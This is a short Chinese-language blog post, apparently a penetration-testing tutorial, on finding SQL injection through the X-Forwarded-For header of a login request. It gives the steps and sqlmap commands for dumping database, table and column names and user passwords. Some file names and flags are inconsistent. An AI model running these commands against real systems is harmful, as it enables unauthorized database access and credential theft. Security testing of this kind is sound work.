X-Forwarded-For注入漏洞

测试思路

1、登录后台提示ip信息不正确,这种情况一般是x-forwarded-for读取客户端ip

2、通过在数据包添加x-forwarded-for:1.1.1.1看 respone包中是否存在1.1.1.1

3、如果存在则证明用x-forwarded-for读取客户端数据,则存在注入漏洞

4、通过在登录框数据包中添加x-forwarded-for:*,用sqlmap 跑注入,跑数据库名,表名,字段名,字段内容

测试步骤

1、登陆随意输入密码,返回提示

 

 

 2、在数据包添加x-forwarded-for:1.1.1.1看 respone包中是否存在1.1.1.1

 

 

 

 

 

 3、存在此漏洞,保存请求包到1.txt里(X-Forwarded-For值改为*)

 

 

 4、使用sqlmap开始跑,

    1)sqlmap爆出库名:sqlmap -r d:/aaa.txt --db --batch

    2)表名:sqlmap -r d:/aaa.txt -D webcalender --tables --batch

    3)字段:sqlmap -r d:/aa.txt -D webcalender -T user --columns --batch 

    4)字段内容:sqlmap -r d:/aa.txt -D webcalender -T user -C 'user,password' --batch

获取账号与密码

posted @ 2020-04-14 11:21  Ananss  阅读(879)  评论(0编辑  收藏  举报
Live2D